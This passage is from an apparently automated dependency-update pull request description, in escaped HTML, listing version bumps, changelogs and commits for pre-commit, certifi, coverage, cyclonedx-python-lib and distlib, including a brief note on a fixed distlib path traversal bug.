href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3657\"\u003e#3657\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/054cc5bd6bb1b20faa1eefe09f0de3b68fceee94\"\u003e\u003ccode\u003e054cc5b\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/5c0f3024d2524f6e029a4c333392fd9be9fb27f6\"\u003e\u003ccode\u003e5c0f302\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3652\"\u003e#3652\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/a5d91142676630f8130020b35e166e0c0e92b8f4\"\u003e\u003ccode\u003ea5d9114\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/129a1f5ca1eaee0c952a5e7a07faae305c5e15bc\"\u003e\u003ccode\u003e129a1f5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3641\"\u003e#3641\u003c/a\u003e from pre-commit/mxr-patch-1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pre-commit/pre-commit/compare/v4.5.1...v4.6.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2026.2.25 to 2026.5.20\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7ea151afc2ce6bef0555b9349902bd867e928dd\"\u003e\u003ccode\u003ed7ea151\u003c/code\u003e\u003c/a\u003e 2026.05.20 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/413\"\u003e#413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/5dddfb072243da27adde885b73ba9b809c3224ca\"\u003e\u003ccode\u003e5dddfb0\u003c/code\u003e\u003c/a\u003e 2026.04.22 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/410\"\u003e#410\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/f99eccdaf87f7c10e521a58a700ca3eb94a0787e\"\u003e\u003ccode\u003ef99eccd\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 8.1.0 to 8.1.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/404\"\u003e#404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/918bed055f7291719512af186c1c24710f845660\"\u003e\u003ccode\u003e918bed0\u003c/code\u003e\u003c/a\u003e Bump actions/upload-artifact from 7.0.0 to 7.0.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/405\"\u003e#405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/0a49067eb434e53e1f8df5f7707d5dc05ef9def4\"\u003e\u003ccode\u003e0a49067\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.13.0 to 1.14.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/403\"\u003e#403\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/acf6ce8e39e3b125f4349e11904295e4fe4c1bed\"\u003e\u003ccode\u003eacf6ce8\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 8.0.0 to 8.0.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/398\"\u003e#398\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/feb0ed26163a9417ea0fb8eb52d47e79fcf202ab\"\u003e\u003ccode\u003efeb0ed2\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 7.0.0 to 8.0.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/397\"\u003e#397\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d9c11a50369cc377abb40f7909ded3d6da4d98a3\"\u003e\u003ccode\u003ed9c11a5\u003c/code\u003e\u003c/a\u003e Bump actions/upload-artifact from 6.0.0 to 7.0.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/396\"\u003e#396\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2026.02.25...2026.05.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `coverage` from 7.13.5 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coveragepy/coveragepy/blob/main/CHANGES.rst\"\u003ecoverage's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 7.14.1 — 2026-05-26\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the HTML report used typographic niceties to make file paths more\nreadable by adding a small amount of space around slashes. Those spaces\ninterfered with searching the page for file paths of interest. Now the report\nuses CSS to accomplish the same visual tweak so that searches with slashes\nwork correctly. Closes \u003ccode\u003eissue 2170\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eAdd a 3.16 PyPI classifier \u0026lt;hugo-316_\u0026gt;\u003c/code\u003e_ since we test on the 3.16 main\nbranch.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 2170: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2170\"\u003ecoveragepy/coveragepy#2170\u003c/a\u003e\n.. _hugo-316: \u003ca href=\"https://mastodon.social/@hugovk/116588523571204490\"\u003ehttps://mastodon.social/@​hugovk/116588523571204490\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e.. _changes_7-14-0:\u003c/p\u003e\n\u003ch2\u003eVersion 7.14.0 — 2026-05-10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFeature: now when running one of the reporting commands, if there are\nparallel data files that need combining, they will be implicitly combined\nbefore creating the report. There is no option to avoid the combination; let\nus know if you have a use case that requires it.  Thanks, \u003ccode\u003eTim Hatch \u0026lt;pull 2162_\u0026gt;\u003c/code\u003e\u003cem\u003e. Closes \u003ccode\u003eissue 1781\u003c/code\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the output from \u003ccode\u003ecombine\u003c/code\u003e was too verbose, listing each file\nconsidered. Now it shows a single line with the counts of files combined,\nfiles skipped, and files with errors. The \u003ccode\u003e-q\u003c/code\u003e flag suppresses this line.\nThe old detailed lines are available with the new \u003ccode\u003e--debug=combine\u003c/code\u003e option.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: running a Python file through a symlink now sets the sys.path correctly,\nmatching regular Python behavior. Fixes \u003ccode\u003eissue 2157\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: \u003ccode\u003eCollector.flush_data\u003c/code\u003e could fail with \u0026quot;RuntimeError: Set changed\nsize during iteration\u0026quot; when a tracer in another thread added a line to the\nper-file set that \u003ccode\u003eadd_lines\u003c/code\u003e (or \u003ccode\u003eadd_arcs\u003c/code\u003e) was iterating. The values\npassed to \u003ccode\u003eCoverageData\u003c/code\u003e are now snapshotted via \u003ccode\u003edict.copy()\u003c/code\u003e and\n\u003ccode\u003eset.copy()\u003c/code\u003e, which are atomic under the GIL. Thanks, \u003ccode\u003eAlex Vandiver \u0026lt;pull 2165_\u0026gt;\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the soft keyword \u003ccode\u003elazy\u003c/code\u003e is now bolded in HTML reports.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWe are no longer testing eventlet support. Eventlet started issuing stern\ndeprecation warnings that break our tests. Our support code is still there.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 1781: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/1781\"\u003ecoveragepy/coveragepy#1781\u003c/a\u003e\n.. _issue 2157: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2157\"\u003ecoveragepy/coveragepy#2157\u003c/a\u003e\n.. _pull 2162: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/pull/2162\"\u003ecoveragepy/coveragepy#2162\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/64d9b66fd852c1920ffe6cb8b58d7e4fdae90226\"\u003e\u003ccode\u003e64d9b66\u003c/code\u003e\u003c/a\u003e docs: correct the date for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/6fa7dd44c25e1a660252faaf030dd8f2f1e20861\"\u003e\u003ccode\u003e6fa7dd4\u003c/code\u003e\u003c/a\u003e chore: bump actions/dependency-review-action (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2181\"\u003e#2181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/078afae263597b004eb9a85d880b6a65008e75ed\"\u003e\u003ccode\u003e078afae\u003c/code\u003e\u003c/a\u003e docs: sample HTML for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/cb4f028a36e008b664739d04f387b90ee5105044\"\u003e\u003ccode\u003ecb4f028\u003c/code\u003e\u003c/a\u003e docs: prep for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ae2d09f562271c6169534e1c242d015dd0823dda\"\u003e\u003ccode\u003eae2d09f\u003c/code\u003e\u003c/a\u003e Merge branch 'nedbat/classifire-316-kits'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/2c3568b2e041f2c0dbbc8eaa3919d46ee891b743\"\u003e\u003ccode\u003e2c3568b\u003c/code\u003e\u003c/a\u003e build: declare 3.16 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/faa68f8601cf098701b68976dbb73b9fc23c9297\"\u003e\u003ccode\u003efaa68f8\u003c/code\u003e\u003c/a\u003e chore: bump github/codeql-action in the action-dependencies group (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2173\"\u003e#2173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/eb55feedf54b363e3d0b678f20abf3bfd3551a88\"\u003e\u003ccode\u003eeb55fee\u003c/code\u003e\u003c/a\u003e test: we don't need PyPy \u0026lt; 7.3.22 anymore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ac168fe53c04cdb2ff5231c0c4e5045021ee339b\"\u003e\u003ccode\u003eac168fe\u003c/code\u003e\u003c/a\u003e test: the text summary should show missing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/fed4bd2db3c1cb2916a07791041da693fbf8e996\"\u003e\u003ccode\u003efed4bd2\u003c/code\u003e\u003c/a\u003e chore: upgrade virtualenv\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/coveragepy/coveragepy/compare/7.13.5...7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cyclonedx-python-lib` from 11.7.0 to 11.8.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/releases\"\u003ecyclonedx-python-lib's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.8.0 (2026-06-04)\u003c/h2\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate CDX summary (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/951\"\u003e#951\u003c/a\u003e, \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/752b1620a23e319add81c505fe7197a2ae3cca06\"\u003e\u003ccode\u003e752b162\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/985\"\u003e#985\u003c/a\u003e, \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/303889ba2b47033ae693c1af8bff552664e1910c\"\u003e\u003ccode\u003e303889b\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePull SPDX license IDs v1.1-3.28.0 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/986\"\u003e#986\u003c/a\u003e, \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/42ff04444fa054d86da2302bc62e1bffd3b397df\"\u003e\u003ccode\u003e42ff044\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore: extract glob for pyupgrade to separate script for cross-platform compatibility by \u003ca href=\"https://github.com/peschuster\"\u003e\u003ccode\u003e@​peschuster\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/950\"\u003eCycloneDX/cyclonedx-python-lib#950\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: update CDX summary by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/951\"\u003eCycloneDX/cyclonedx-python-lib#951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: fix test coverage reporting by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/956\"\u003eCycloneDX/cyclonedx-python-lib#956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): update tomli requirement from 2.3.0 to 2.4.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/954\"\u003eCycloneDX/cyclonedx-python-lib#954\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(release): use own GH app for releasing by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/958\"\u003eCycloneDX/cyclonedx-python-lib#958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): pin GitHub Actions to immutable SHAs while preserving tag tracking by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/961\"\u003eCycloneDX/cyclonedx-python-lib#961\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: add zizmor workflow to harden GitHub Actions security by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/968\"\u003eCycloneDX/cyclonedx-python-lib#968\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate PULL_REQUEST_TEMPLATE.md by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/974\"\u003eCycloneDX/cyclonedx-python-lib#974\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: Update CONTRIBUTING.md by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/975\"\u003eCycloneDX/cyclonedx-python-lib#975\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): comments for pinned actions by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/984\"\u003eCycloneDX/cyclonedx-python-lib#984\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1 by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/985\"\u003eCycloneDX/cyclonedx-python-lib#985\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump actions/create-github-app-token from 3.1.1 to 3.2.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/982\"\u003eCycloneDX/cyclonedx-python-lib#982\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump actions/download-artifact from 7.0.0 to 8.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/964\"\u003eCycloneDX/cyclonedx-python-lib#964\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump actions/upload-artifact from 6.0.0 to 7.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/963\"\u003eCycloneDX/cyclonedx-python-lib#963\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: pull SPDX license IDs v1.1-3.28.0 by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/986\"\u003eCycloneDX/cyclonedx-python-lib#986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.8.0\"\u003ehttps://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.8.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev11.7.1-alpha.2 (2026-05-04)\u003c/h2\u003e\n\u003cp\u003etest release during \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/969\"\u003eCycloneDX/cyclonedx-python-lib#969\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003cstrong\u003eDetailed Changes\u003c/strong\u003e: \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.7.1-alpha.2\"\u003ev11.7.0...v11.7.1-alpha.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev11.7.1-alpha.1 (2026-05-04)\u003c/h2\u003e\n\u003cp\u003etest release during \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/969\"\u003eCycloneDX/cyclonedx-python-lib#969\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md\"\u003ecyclonedx-python-lib's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.8.0 (2026-06-04)\u003c/h2\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate CDX summary (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/951\"\u003e#951\u003c/a\u003e,\n\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/752b1620a23e319add81c505fe7197a2ae3cca06\"\u003e\u003ccode\u003e752b162\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1\n(\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/985\"\u003e#985\u003c/a\u003e,\n\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/303889ba2b47033ae693c1af8bff552664e1910c\"\u003e\u003ccode\u003e303889b\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePull SPDX license IDs v1.1-3.28.0\n(\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/986\"\u003e#986\u003c/a\u003e,\n\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/42ff04444fa054d86da2302bc62e1bffd3b397df\"\u003e\u003ccode\u003e42ff044\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/e537812860bc7800ee6252524da2353bee71aba3\"\u003e\u003ccode\u003ee537812\u003c/code\u003e\u003c/a\u003e chore(release): 11.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/42ff04444fa054d86da2302bc62e1bffd3b397df\"\u003e\u003ccode\u003e42ff044\u003c/code\u003e\u003c/a\u003e feat: pull SPDX license IDs v1.1-3.28.0 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/986\"\u003e#986\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/590402a0c963816a48902eba86d6be963ebf3ed0\"\u003e\u003ccode\u003e590402a\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/upload-artifact from 6.0.0 to 7.0.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/963\"\u003e#963\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/051abcef774a606b93da55b8fed4aa4ae056a744\"\u003e\u003ccode\u003e051abce\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/download-artifact from 7.0.0 to 8.0.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/964\"\u003e#964\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/bc961efabd6a898f2d349ad97d2804d66b60e45c\"\u003e\u003ccode\u003ebc961ef\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/create-github-app-token from 3.1.1 to 3.2.0 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/982\"\u003e#982\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/303889ba2b47033ae693c1af8bff552664e1910c\"\u003e\u003ccode\u003e303889b\u003c/code\u003e\u003c/a\u003e feat: add support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/985\"\u003e#985\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/392ba604f2510bdfaab5020f8cd7c54f8140dd6a\"\u003e\u003ccode\u003e392ba60\u003c/code\u003e\u003c/a\u003e chore(ci): comments for pinned actions (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/984\"\u003e#984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/0daf3f99c171d64634443cfecea12eb10c84fde9\"\u003e\u003ccode\u003e0daf3f9\u003c/code\u003e\u003c/a\u003e chore: Update CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/975\"\u003e#975\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/1a6dfb047631085d2acddc38afbe41413a4f9420\"\u003e\u003ccode\u003e1a6dfb0\u003c/code\u003e\u003c/a\u003e Update PULL_REQUEST_TEMPLATE.md (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/974\"\u003e#974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/52c29afe0e17339daf77fc107f21072d4bf52425\"\u003e\u003ccode\u003e52c29af\u003c/code\u003e\u003c/a\u003e chore: add zizmor workflow to harden GitHub Actions security (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/968\"\u003e#968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.8.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `distlib` from 0.4.0 to 0.4.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/distlib/blob/master/CHANGES.rst\"\u003edistlib's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e0.4.1\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\nReleased: 2026-06-02\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003escripts\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix path traversal bug in handling entry points which allowed escaping the scripts directory.\nThanks to tonghuaroot for the comprehensive report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003etests\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/distlib/issues/251\"\u003e#251\u003c/a\u003e: Change test function following a reorganization which happened in the Python 